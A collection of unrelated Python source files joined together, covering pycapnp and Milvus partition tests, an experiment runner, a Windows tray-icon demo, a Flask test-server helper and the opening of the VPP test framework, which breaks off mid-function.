def __init__(self, val=1):
self.val = val
def foo(self, i, j, **kwargs):
return str(i * 5 + self.val)
class SimpleRestorer(test_capability_capnp.TestSturdyRefObjectId.Restorer):
def restore(self, ref_id):
assert ref_id.tag == 'testInterface'
return Server(100)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_using_threads():
capnp.remove_event_loop(True)
capnp.create_event_loop(True)
read, write = socket.socketpair(socket.AF_UNIX)
def run_server():
restorer = SimpleRestorer()
server = capnp.TwoPartyServer(write, restorer)
capnp.wait_forever()
server_thread = threading.Thread(target=run_server)
server_thread.daemon = True
server_thread.start()
client = capnp.TwoPartyClient(read)
ref = test_capability_capnp.TestSturdyRefObjectId.new_message(tag='testInterface')
cap = client.restore(ref)
cap = cap.cast_as(test_capability_capnp.TestInterface)
remote = cap.foo(i=5)
response = remote.wait()
assert response.x == '125'
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils import *
from constants import *
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_name_name_None(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_different_partition_names(self, connect, collection):
'''
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
'''
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities)
assert len(insert_ids) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(insert_ids) == len(ids)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(insert_ids) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_insert_ids = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_insert_ids) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.level(2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
ids_new = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(ids_new) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.level(2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.level(2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.level(2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
simple.py
|
import multiprocessing as mp
import traceback
import sys
import os
import math
from ..util import get_logger, mkfile
from ..result import write_result
def queue_to_list(q):
l = []
while q.qsize() != 0:
l.append(q.get())
return l
def generate_instances(experiment):
instances = []
for problem in experiment.problems:
instances.extend(problem.generate_instances(experiment))
return instances
class SimpleRunner:
def __init__(self, num_threads=None):
        if num_threads is None:
num_threads = math.ceil(mp.cpu_count() / 2.0)
self.num_threads = num_threads
def run(self, experiment):
instances = generate_instances(experiment)
logger = get_logger()
# TODO (Brad): We could probably re-use instances here. Before we had to start new processes because of Popper
# re-using pyswip instances. However, as long as all systems are run as subcommands, this is not a problem.
ctx = mp.get_context('spawn')
with ctx.Manager() as manager:
sema = manager.BoundedSemaphore(self.num_threads)
results_q = manager.Queue()
all_processes = []
unhandled_processes = []
for instance in instances:
sema.acquire()
# This is an absurd hack to handle processes that seg fault without releasing the semaphore.
new_unhandled_processes = []
for process in unhandled_processes:
                    if process.exitcode is None:
new_unhandled_processes.append(process)
elif process.exitcode < 0: # For some reason I was getting -6 instead of SIGSEGV -11
logger.debug(f"{process.name} CRASHED. RELEASING")
sema.release()
unhandled_processes = new_unhandled_processes
p = ctx.Process(target=self.run_instance, args=(experiment.output_path, instance, sema, results_q), name=instance.name)
all_processes.append(p)
unhandled_processes.append(p)
p.start()
# TODO(Brad): Handle timing out each process?
for p in all_processes:
p.join()
result_list = queue_to_list(results_q)
for result in result_list:
logger.info(result)
results_file = os.path.abspath(mkfile(experiment.output_path, "results.json"))
write_result(results_file, result_list)
logger.info(f"Results for {len(result_list)} instances written to {results_file}")
def run_instance(self, output_path, instance, sema, results_q):
logger = get_logger()
logger.info(f'\nRunning {instance.name}')
try:
result = instance.run()
except Exception as e:
logger.info(f"Exception in instance {instance.name}")
logger.info(traceback.format_exc())
logger.error("Unexpected error:", sys.exc_info()[0])
raise e
logger.info(f'{instance.name} completed in {result.total_exec_time:0.3f}s')
# Save results to a file.
write_result(mkfile(instance.output_dir(output_path), "results.json"), result)
results_q.put(result, block=True)
sema.release()
return result
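# Usage sketch (illustrative; assumes an `experiment` object exposing the
# `problems` and `output_path` attributes used above):
#
#   runner = SimpleRunner(num_threads=4)
#   runner.run(experiment)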
|
demo.py
|
# -*- coding: UTF-8 -*-
"""
@Project :pywin10
@File :demo.py
@Author :Gao yongxian
@Date :2021/11/30 13:03
@contact: g1695698547@163.com
"""
import threading
import tkinter
import win32gui
from pywin10 import TaskBarIcon
class MainWindow:
def __init__(self):
self.root = tkinter.Tk()
        # Start the resident background thread
backend_thread = threading.Thread(target=self.backend)
        backend_thread.daemon = True
backend_thread.start()
        # Pop up a notification when the window is clicked
self.root.bind('<ButtonPress-1>', self._on_tap)
        # Custom handler for the close button
self.root.protocol("WM_DELETE_WINDOW", self._close)
self.root.mainloop()
def _on_tap(self, event):
self.t.ShowToast()
def _close(self):
        self.t.ShowToast(title="Minimized", msg="The window has been minimized to the tray icon")
self.root.withdraw()
def _show(self):
self.root.deiconify()
def ding(self, *args):
print("ding 接收参数:", args)
def _left_click(self, *args):
print("_left_click 接收参数:", args)
def exit(self):
        # Quit the TaskBarIcon
win32gui.DestroyWindow(self.t.hwnd)
        # Quit Tkinter
self.root.destroy()
def backend(self):
        # None of TaskBarIcon's parameters are required; even with self.t = TaskBarIcon() you can still send notifications, etc.
self.t = TaskBarIcon(
            left_click=(self._left_click, (1, 2)),  # Left-click callback, optional (to pass arguments, use the form (func, (arg1, arg2)))
            double_click=self._show,  # Left double-click callback, optional (pass the bare function if no arguments are needed)
            icon="python.ico",  # Tray icon, optional
            hover_text="TaskBarIcon",  # Tooltip text shown when hovering over the tray icon, optional
            menu_options=[  # Optional
                ['退出', "退出.ico", self.exit, 1],  # Menu item format: ["item name", "icon path or None", callback or submenu list, numeric id (any unique number)]
["分隔符", None, None, 111],
['顶一顶', "ding.ico", (self.ding, (1, 2, 3)), 44],
['日历', "日历.ico", None, 3],
['主页', "主页.ico", self._show, 2],
["分隔符", None, None, 7],
["更多选项", "编辑.ico", [
['使用说明', "等待文件.ico", None, 25],
["分隔符", None, None, 17],
['hello', "github.ico", None, 16],
['hello2', "github.ico", None, 1116],
], 4],
],
menu_style="iconic", # 设置右键菜单的模式,可以不设置:normal(不展示图标),iconic(展示图标)
icon_x_pad=12, # 设置图标左边距
)
        # Note: win32gui.PumpMessages() is a blocking message loop, similar to tkinter's mainloop.
        # Since both loops block, they would conflict, so this one runs in the background thread.
win32gui.PumpMessages()
if __name__ == '__main__':
MainWindow()
|
daemon.py
|
from uuid import uuid4
from flask import Flask, request
import threading
import requests
import time
from contextlib import contextmanager
import sys
methods = ["GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE"]
class Daemon:
def __init__(self, app: Flask):
self._app = app
self.uuid = str(uuid4())
# Create a unique endpoint for shutting down the server.
# Uses uuid so there are no collisions with already defined endpoints.
@self._app.route(f'/{self.uuid}', endpoint=self.uuid)
def shutdown():
print("Shutting app down")
func = request.environ.get('werkzeug.server.shutdown')
func()
return "stopping"
self.thread = None
self.stdout = self.get_stdout()
def stop(self):
requests.get(f"http://127.0.0.1:5000/{self.uuid}")
        self.stdout.__exit__(None, None, None)
def start(self):
self.thread = threading.Thread(target=self._app.run, )
self.stdout.__enter__()
self.thread.start()
time.sleep(1)
def __getattr__(self, key):
class Endpoint:
def __init__(self, string):
self.string = string
print(string)
def __getattr__(self, method):
if method in methods:
def call(**kwargs):
response = requests.request(method, f"http://127.0.0.1:5000/{self.string}", **kwargs)
return response
return call
else:
return Endpoint(f"{self.string}/{method}")
return Endpoint(key)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
@contextmanager
def get_stdout(self):
class MyStream:
def __init__(self, parent):
self.old_stdout = sys.stdout
self.parent = parent
def write(self, msg):
ident = threading.currentThread().ident
if self.parent.thread:
censored = [self.parent.thread.ident]
else:
censored = []
if ident not in censored:
if threading.main_thread().ident != ident:
prefix = f'[Daemon] ' if msg.strip() else ''
else:
prefix = f'[Main] ' if msg.strip() else ''
self.old_stdout.write(prefix + msg)
def flush(self):
self.old_stdout.flush()
sys.stdout = MyStream(self)
try:
yield
finally:
sys.stdout = sys.stdout.old_stdout
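# Usage sketch (illustrative; the /ping endpoint is hypothetical):
#
#   app = Flask(__name__)
#
#   @app.route("/ping")
#   def ping():
#       return "pong"
#
#   daemon = Daemon(app)
#   with daemon:                   # starts app.run() in a background thread
#       r = daemon.ping.GET()      # GET http://127.0.0.1:5000/ping
#       print(r.text)              # "pong"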
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import re
import time
import faulthandler
import random
import copy
import platform
import shutil
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
from abc import ABC, abstractmethod
from struct import pack, unpack
import scapy.compat
from scapy.packet import Raw, Packet
from config import config, available_cpus, num_cpus, max_vpp_cpus
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi import VppEnum
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
SKIP_CPU_SHORTAGE = 5
if config.debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not config.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not config.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, config.vpp, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
# marks the suites broken when ASan is enabled
FIXME_ASAN = 3
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
tag_fixme_asan = create_tag_decorator(TestCaseTag.FIXME_ASAN)
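# Illustrative example (class name is hypothetical): marking a suite that must
# run at the end on a single test runner:
#
#   @tag_run_solo
#   class TestTimingSensitive(VppTestCase):
#       """ Timing-sensitive scenarios """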
class DummyVpp:
returncode = None
pid = 0xcafebafe
def poll(self):
pass
def terminate(self):
pass
class CPUInterface(ABC):
cpus = []
skipped_due_to_cpu_lack = False
@classmethod
@abstractmethod
def get_cpus_required(cls):
pass
@classmethod
def assign_cpus(cls, cpus):
cls.cpus = cpus
class VppTestCase(CPUInterface, unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_statseg_config = ""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
remove_configured_vpp_objects_on_tear_down = True
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def skip_fixme_asan(cls):
""" if @tag_fixme_asan & ASan is enabled - mark for skip """
if cls.has_tag(TestCaseTag.FIXME_ASAN):
vpp_extra_cmake_args = os.environ.get('VPP_EXTRA_CMAKE_ARGS', '')
if 'DVPP_ENABLE_SANITIZE_ADDR=ON' in vpp_extra_cmake_args:
cls = unittest.skip("Skipping @tag_fixme_asan tests")(cls)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
cls.debug_attach = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
elif dl == "attach":
cls.debug_attach = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@classmethod
def get_vpp_worker_count(cls):
if not hasattr(cls, "vpp_worker_count"):
if cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
else:
cls.vpp_worker_count = config.vpp_worker_count
return cls.vpp_worker_count
@classmethod
def get_cpus_required(cls):
return 1 + cls.get_vpp_worker_count()
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = config.step
cls.plugin_path = ":".join(config.vpp_plugin_dir)
cls.test_plugin_path = ":".join(config.vpp_test_plugin_dir)
cls.extern_plugin_path = ":".join(config.extern_plugin_dir)
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
size = re.search(r"\d+[gG]", config.coredump_size)
if size:
coredump_size = f"coredump-size {config.coredump_size}".lower()
else:
coredump_size = "coredump-size unlimited"
default_variant = config.variant
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = config.api_fuzz
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [
config.vpp,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.get_api_segment_prefix(), "}",
"cpu", "{", "main-core", str(cls.cpus[0]), ]
if cls.extern_plugin_path not in (None, ""):
cls.extra_vpp_plugin_config.append(
"add-path %s" % cls.extern_plugin_path)
if cls.get_vpp_worker_count():
